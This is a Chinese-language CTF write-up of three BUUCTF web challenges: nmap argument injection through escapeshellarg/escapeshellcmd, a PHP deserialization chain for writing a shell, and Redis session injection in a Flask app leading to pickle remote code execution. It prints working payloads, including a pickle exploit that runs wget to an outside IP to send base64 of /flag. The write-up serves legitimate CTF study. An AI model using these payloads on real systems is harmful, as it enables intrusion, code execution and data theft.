BUUCTF平台-web-边刷边记录-2

1.one line tool

php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

这道题主要是命令注入,利用escapeshellarg 和 escapeshellcmd前后使用时通过注入单引号来导致逃逸出一个单引号 从而导致可以参数注入

这里主要用到nmap的两个参数-iL 和-oN 以任意格式输出,-oX不行,这样不会把/flag的内容输出,必须要用-N才能解析/flag中的内容,从而输出到指定的路径,像这种短的代码都可以拿到本地来测试,也很方便调试。

payload:' + -iL /flag + -oN 输出路径 

BUUCTF平台-web-边刷边记录-2_第1张图片

 

2.upload

这道题来自2019强网杯,直接扫描目录就能得到源代码,之后就进行代码审计:

BUUCTF平台-web-边刷边记录-2_第2张图片

对于这种mvc框架性的web,可以直接先看其路由,然后结合路由以及控制器去看程序的逻辑

BUUCTF平台-web-边刷边记录-2_第3张图片

首先反序列化点在此,那么接下来要找可以利用的类,那么既然存在反序列化那么就要找__destruct方法了,一共有四个类:

BUUCTF平台-web-边刷边记录-2_第4张图片

BUUCTF平台-web-边刷边记录-2_第5张图片

但是只有index.php才存在__destruct方法,那么我们应该反序列化这个类来触发漏洞

那么这里通过序列化profile类来进行反序列化,这里调用index()方法,而其不存在index方法,则会调用__call方法

BUUCTF平台-web-边刷边记录-2_第6张图片

这里__call方法又会调用name属性,也就是index属性,但是明显不存在这个属性,那么此时会调用__get方法,返回profile类的except数组中的值,当时我想的是这里能不能直接进行代码执行,因为有这一串:

$this->{$this->{$name}}($arguments);

这里是不能够任意代码执行的

BUUCTF平台-web-边刷边记录-2_第7张图片

这里只能调用profile类中的已经定义的方法,因为是先解析出来$this->$d的值,然后再调用$this>"b"(),此时不存在b方法,并不会去解析$b变量,所以这里通过调用上传文件方法,来达到写shell的效果:

3.bookhub

  这道题在登陆时限制了一些内网的ip的白名单,并且给了一个外网的ip,此时修改xff是不行的,nginx获取到的是中间转发过去的ip地址

,而给的外网ip的5000端口就开了一个debug模型的web,buu里面直接给的debug模式下的。

        然后就是涉及未授权访问,这里涉及到python的修饰器调用顺序

BUUCTF平台-web-边刷边记录-2_第8张图片

正常情況下,如上图,调用顺序为login_required->user_blueprint,但是在debug模式下:

BUUCTF平台-web-边刷边记录-2_第9张图片

这里login_required放在了外层,那么就没用了,可以直接访问refresh_session方法,这里做题的时候直接观察也可以,除了这一处其它地方login都在里层。这个函数的作用是清除除了自己的以外所有人的session

BUUCTF平台-web-边刷边记录-2_第10张图片

BUUCTF平台-web-边刷边记录-2_第11张图片

首先访问这个路由,发现需要设置csrf token

BUUCTF平台-web-边刷边记录-2_第12张图片

然后回到登陆页找到表单的csrf token值,再次访问

BUUCTF平台-web-边刷边记录-2_第13张图片

BUUCTF平台-web-边刷边记录-2_第14张图片

此时访问成功了,此时又涉及到session的拼接,prefix不可控,但是flask的session在客户端,是可以控制的,因此进行拼接

BUUCTF平台-web-边刷边记录-2_第15张图片

 

 又因为app.config['SESSION_KEY_PREFIX'] = 'bookhub:session:',所以可以拼接:

19a79b29-3524-4efa-99d6-3997ae425761",redis evilcode,"bookhub:session:aaa

首先对我们的bookhub:session进行一个覆盖,赋值为aaa,然后将redis的恶意数据拼接进去,然后当我们带着aaa这个session当问的时候就会触发pickle反序列化来执行恶意代码。所以接下来就是如何构造evilcode,我们可以给自己构造的session赋值为反弹shell的值。然后再带着session触发序列化即可。

 首先生成payload:

import cPickle
import os

class exp(object):
    def __reduce__(self):
        s="wget 104.224.146.7:23333?`cat /flag* | base64`"
        return (os.system,(s,))

e = exp()
s = cPickle.dumps(e)
s_bypass = ""
for i in s:
    s_bypass +="string.char(%s).."%ord(i)
evilcode = '''
redis.call("set","bookhub:session:tr1ple",%s)
'''%s_bypass[:-2]
payload = '''
6f17c248-ed0d-4d74-bba6-21b9342c854a",%s,"bookhub:session:tr1ple
'''%evilcode
print payload.replace(" ","")

这里要用到cpickle来生成序列化的数据,然后再拼接到payload中

这里首先要带着生成的payload作为cookie值去访问login来得到csrf的token值,然后此时再向 /admin/system/refresh_session/ 页面post我们的csrf_token&submit,此时并将payload放到bookhub-session中,此时就能够将cookie值设置到redis中,那么此时只要再访问login页面就能触发redis反序列化session中的payload,从而带出flag的值

BUUCTF平台-web-边刷边记录-2_第16张图片

BUUCTF平台-web-边刷边记录-2_第17张图片

然后此时再触发session的拼接,然后此时带着bookhub-session为tr1ple的值访问login,就会触发反序列化

BUUCTF平台-web-边刷边记录-2_第18张图片

BUUCTF平台-web-边刷边记录-2_第19张图片

此时vps上已经接收到了flag的值

当我们进入redis,想要查看存储的值时,可以使用keys *来查看所有存储的值

 

import cPickle
import os
class genpoc(object):
    def __reduce__(self):
        s = """wget 104.224.146.7:23333"""
        return os.system, (s,)
evil = cPickle.dumps(genpoc()) print evil.replace("\n","\\n")

我们也可以不用转码来构造pickle的序列化数据

bookhub-session=aaa"} redis.call("set","bookhub:session:aaa","pickle序列化数据")--; 
通过redis.call来设置session值,这里app里已经设置了session的前缀为bookhub:session:,所以aaa的值就可以设置为序列化数据

BUUCTF平台-web-边刷边记录-2_第20张图片

 

此时就能够带上csrf_token去访问refresh页面来设置新的cookie值,然后再设置session为aaa去访问login从而触发反序列化,同样能收到请求

 BUUCTF平台-web-边刷边记录-2_第21张图片

 

你可能感兴趣的:(BUUCTF平台-web-边刷边记录-2)